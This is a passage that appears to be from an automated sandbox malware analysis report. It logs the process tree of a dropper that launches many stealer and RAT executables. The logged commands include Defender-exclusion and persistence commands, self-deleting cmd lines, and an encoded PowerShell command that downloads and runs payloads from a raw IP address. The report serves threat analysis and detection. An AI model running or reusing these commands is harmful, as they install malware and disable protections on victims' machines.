PID 2364 wrote to memory of 1784	2364	4363463463464363463463463.exe	110
PID 2364 wrote to memory of 1784	2364	4363463463464363463463463.exe	110
PID 2364 wrote to memory of 1784	2364	4363463463464363463463463.exe	110
PID 2364 wrote to memory of 3208	2364	4363463463464363463463463.exe	111
PID 2364 wrote to memory of 3208	2364	4363463463464363463463463.exe	111
PID 2364 wrote to memory of 3208	2364	4363463463464363463463463.exe	111
PID 3628 wrote to memory of 4936	3628	1972612826.exe	112

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:3264
- C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
  "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2364
- - C:\Users\Admin\AppData\Local\Temp\Files\stail.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\stail.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2444
  - - C:\Users\Admin\AppData\Local\Temp\is-NEPMR.tmp\stail.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-NEPMR.tmp\stail.tmp" /SL5="$D0142,5977381,56832,C:\Users\Admin\AppData\Local\Temp\Files\stail.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:1124
    - - C:\Windows\SysWOW64\net.exe
        
        "C:\Windows\system32\net.exe" pause hd_video_converter_fox_125
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2252
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 pause hd_video_converter_fox_125
        6⤵
        
        PID:1508
    - - C:\Users\Admin\AppData\Local\HD Video Converter Fox 1.2.5\hdvideoconverterfox125.exe
        
        "C:\Users\Admin\AppData\Local\HD Video Converter Fox 1.2.5\hdvideoconverterfox125.exe" -i
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2304
- - C:\Users\Admin\AppData\Local\Temp\Files\st.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\st.exe"
    3⤵
    - Executes dropped EXE
    PID:420
- - C:\Users\Admin\AppData\Local\Temp\Files\payload.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\payload.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3452
- - C:\Users\Admin\AppData\Local\Temp\Files\notmyfault.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\notmyfault.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    PID:492
- - C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:3176
- - C:\Users\Admin\AppData\Local\Temp\Files\m.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\m.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4200
  - - C:\Windows\sysnldcvmr.exe
      C:\Windows\sysnldcvmr.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2360
    - - C:\Users\Admin\AppData\Local\Temp\554524981.exe
        
        C:\Users\Admin\AppData\Local\Temp\554524981.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2188
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:584
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:1856
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2036
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:2472
    - - C:\Users\Admin\AppData\Local\Temp\1972612826.exe
        
        C:\Users\Admin\AppData\Local\Temp\1972612826.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3628
      - C:\Users\Admin\AppData\Local\Temp\2534135603.exe
        
        C:\Users\Admin\AppData\Local\Temp\2534135603.exe
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4936
    - - C:\Users\Admin\AppData\Local\Temp\267368583.exe
        
        C:\Users\Admin\AppData\Local\Temp\267368583.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2692
    - - C:\Users\Admin\AppData\Local\Temp\1417232562.exe
        
        C:\Users\Admin\AppData\Local\Temp\1417232562.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1256
      - C:\Users\Admin\AppData\Local\Temp\1214126451.exe
        
        C:\Users\Admin\AppData\Local\Temp\1214126451.exe
        6⤵
        Executes dropped EXE
        
        PID:1992
- - C:\Users\Admin\AppData\Local\Temp\Files\LedgerUpdater.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\LedgerUpdater.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4960
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\Files\LedgerUpdater.exe
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Suspicious use of WriteProcessMemory
      PID:4220
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 2.2.2.2 -n 1 -w 3000
        5⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1300
- - C:\Users\Admin\AppData\Local\Temp\Files\Eszop.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Eszop.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2716
- - C:\Users\Admin\AppData\Local\Temp\Files\out_test_sig.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\out_test_sig.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1784
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2036
  - - C:\Windows\SysWOW64\systeminfo.exe
      systeminfo
      4⤵
      System Location Discovery: System Language Discovery
      Gathers system information
      PID:788
- - C:\Users\Admin\AppData\Local\Temp\Files\shell.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\shell.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3208
- - C:\Users\Admin\AppData\Local\Temp\Files\zzzz1.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\zzzz1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:4252
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      PID:1176
- - C:\Users\Admin\AppData\Local\Temp\Files\xworm.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\xworm.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:1640
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5008
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAeQBsACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBtACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAGoAZQBjAHQAaQBvAG4AIABlAHIAcgBvAHIAIQAgAEYAaQBsAGUAIABtAHUAcwB0ACAAYgBlACAAcwB0AGEAcgB0AGUAZAAgAGEAcwAgAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIQAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAYwB1AGsAIwA+ADsAIgA7ADwAIwBsAG0AbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAcQBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAZABrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB5ACMAPgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AWQBlAGwAbABvAHcALgBlAHgAZQAnACwAIAA8ACMAdgBqAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB6AGMAcAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB1AGIAZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQApADwAIwB3AGwAZgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AYQB2AGQAaQBzAGEAYgBsAGUALgBiAGEAdAAnACwAIAA8ACMAZAB3AGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGQAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB5AGwAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBBAHYAZABpAHMALgBiAGEAdAAnACkAKQA8ACMAcABmAG0AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMgAwADkALgAxADYAMAAuADcAMAAvAEwAaQBjAGUAbgBzAGUAQwBoAGUAYwBrAGUAcgAuAGUAeABlACcALAAgADwAIwBiAHMAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAdgBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAYQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApACkAPAAjAHEAdQBzACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADIAMAA5AC4AMQA2ADAALgA3ADAALwBQAEwAVgAuAGUAeABlACcALAAgADwAIwBrAGcAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAagB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAYgBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFAATABUAGUAcwB0AC4AZQB4AGUAJwApACkAPAAjAGEAaQBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGYAeQBqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB4AHEAbQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQA8ACMAcwB2AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgBkAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAZwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEEAdgBkAGkAcwAuAGIAYQB0ACcAKQA8ACMAagBpAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaQByAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAdwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApADwAIwB4AHcAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGMAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdwBnAGgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABMAFQAZQBzAHQALgBlAHgAZQAnACkAPAAjAHoAZgBsACMAPgA="
        5⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:796
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#vmm#>[System.Windows.Forms.MessageBox]::Show('Injection error! File must be started as Administrator!','','OK','Error')<#cuk#>;
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:908
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 272
      4⤵
      Program crash
      PID:4824
- - C:\Users\Admin\AppData\Local\Temp\Files\444.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\444.exe"
    3⤵
    - Executes dropped EXE
    PID:332
  - - C:\Users\Admin\AppData\Roaming\conhost.exe
      "C:\Users\Admin\AppData\Roaming\conhost.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Drops autorun.inf file
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: GetForegroundWindowSpam
      PID:2088
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\conhost.exe" "conhost.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:4984
- - C:\Users\Admin\AppData\Local\Temp\Files\hashed.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\hashed.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    PID:4992
  - - C:\Users\Admin\AppData\Local\Temp\service123.exe
      "C:\Users\Admin\AppData\Local\Temp\service123.exe"
      4⤵
      Loads dropped DLL
      PID:4380
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:904
- - C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe"
    3⤵
    - Executes dropped EXE
    PID:3148
- - C:\Users\Admin\AppData\Local\Temp\Files\taskhost.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\taskhost.exe"
    3⤵
    - Executes dropped EXE
    PID:2036
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\taskhost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4040
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskhost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1648
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    3⤵
    PID:2120
- - C:\Users\Admin\AppData\Local\Temp\Files\test11.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\test11.exe"
    3⤵
    - Executes dropped EXE
    PID:2764
- - C:\Users\Admin\AppData\Local\Temp\Files\pp.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\pp.exe"
    3⤵
    - Executes dropped EXE
    PID:4324
  - - C:\Users\Admin\AppData\Local\Temp\792930788.exe
      C:\Users\Admin\AppData\Local\Temp\792930788.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5308
- - C:\Users\Admin\AppData\Local\Temp\Files\yoyf.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\yoyf.exe"
    3⤵
    - Executes dropped EXE
    PID:4600
- - C:\Users\Admin\AppData\Local\Temp\Files\msedge.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\msedge.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:4972
- - C:\Users\Admin\AppData\Local\Temp\Files\noll.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\noll.exe"
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    PID:5576
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\noll.exe" & rd /s /q "C:\ProgramData\AFIEGCAECGCA" & exit
      4⤵
      PID:5568
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:5656
- - C:\Users\Admin\AppData\Local\Temp\Files\stealc_valenciga.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\stealc_valenciga.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks processor information in registry
    PID:5360
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\stealc_valenciga.exe" & del "C:\ProgramData\*.dll"" & exit
      4⤵
      System Location Discovery: System Language Discovery
      PID:2508
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:3368
- - C:\Users\Admin\AppData\Local\Temp\Files\BitcoinCore.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\BitcoinCore.exe"
    3⤵
    - Executes dropped EXE
    PID:5144
- - C:\Users\Admin\AppData\Local\Temp\Files\contorax.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\contorax.exe"
    3⤵
    - Executes dropped EXE
    PID:3328
  - - C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe
      "C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:3320
- - C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5764
  - - C:\Users\Admin\AppData\Local\Temp\150718146.exe
      C:\Users\Admin\AppData\Local\Temp\150718146.exe
      4⤵
      Executes dropped EXE
      PID:4672
- - C:\Users\Admin\AppData\Local\Temp\Files\Discord2.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Discord2.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2788
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"' & exit
      4⤵
      System Location Discovery: System Language Discovery
      PID:6116
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"'
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:5168
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp43EB.tmp.bat""
      4⤵
      System Location Discovery: System Language Discovery
      PID:2328
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2944
    - - C:\Users\Admin\AppData\Roaming\Discord.exe
        
        "C:\Users\Admin\AppData\Roaming\Discord.exe"
        5⤵
        Executes dropped EXE
        
        PID:5296
- - C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe"
    3⤵
    - Executes dropped EXE
    PID:908
- - C:\Users\Admin\AppData\Local\Temp\Files\probnik.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\probnik.exe"
    3⤵
    - Executes dropped EXE
    PID:5716
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic nic where NetEnabled='true' get MACAddress,Name
      4⤵
      PID:5796
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5880
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5212
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:2936
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:2148
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:2248
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:3836
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5752
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5612
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:4788
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:6072
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:1032
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5284
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5412
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5756
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:3900
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5824
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5880
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:1452
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:3708
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5600
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:6080
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:788
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:3836
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5348
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:3388
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:1032
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5504
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:1696
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:4668
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:6084
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:2204
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:1924
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:2992
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:4040
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:3580
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:4572
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:3360
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:6016
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5188
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5368
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:4548
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:2540
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5780
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:6020
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:2936
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:1564
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:3544
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
